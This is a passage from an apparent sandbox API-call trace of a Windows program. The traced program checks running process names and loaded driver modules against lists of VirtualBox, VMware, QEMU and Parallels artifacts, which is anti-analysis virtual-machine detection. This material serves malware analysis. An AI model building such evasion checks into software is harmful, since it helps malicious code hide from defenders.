(_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="qga.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="windanr.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.632] wcsstr (_Str="wmiadap.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.633] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.633] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.633] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="qga.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="windanr.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.633] wcsstr (_Str="sppsvc.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.634] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="qga.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="windanr.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.634] wcsstr (_Str="sufferexistrich.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="qga.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="windanr.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.634] wcsstr (_Str="have return physical.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.634] wcsstr (_Str="or level.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.634] wcsstr (_Str="or level.exe", _SubStr="qga.exe") returned 0x0 [0070.635] wcsstr (_Str="or level.exe", _SubStr="windanr.exe") returned 0x0 [0070.635] wcsstr (_Str="or level.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.635] wcsstr (_Str="or level.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.635] wcsstr (_Str="or level.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.635] wcsstr (_Str="or level.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="qga.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="windanr.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.635] wcsstr (_Str="court camera.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="qga.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="windanr.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.635] wcsstr (_Str="or-finger.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="qga.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="windanr.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.635] wcsstr (_Str="travel imagine recently.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.635] wcsstr (_Str="school_for.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.635] wcsstr (_Str="school_for.exe", _SubStr="qga.exe") returned 0x0 [0070.635] wcsstr (_Str="school_for.exe", _SubStr="windanr.exe") returned 0x0 [0070.636] wcsstr (_Str="school_for.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.637] LocalFree (hMem=0x2149d0) returned 0x0 [0070.637] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0070.638] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x2149d0 [0070.638] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x2149d0, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x2149d0, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0070.638] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0070.639] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0070.639] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0070.640] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0070.641] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0070.641] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0070.642] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0070.642] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0070.642] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0070.642] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0070.642] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0070.642] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0070.642] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0070.643] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0070.643] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0070.644] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0070.644] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0070.644] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0070.644] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0070.644] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0070.645] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0070.645] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0070.646] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0070.646] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0070.646] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0070.646] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0070.647] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0070.647] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0070.648] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0070.648] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0070.649] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0070.649] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0070.649] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0070.649] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0070.649] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0070.650] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0070.650] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0070.650] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0070.650] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0070.650] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0070.651] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0070.651] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0070.652] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0070.652] strstr 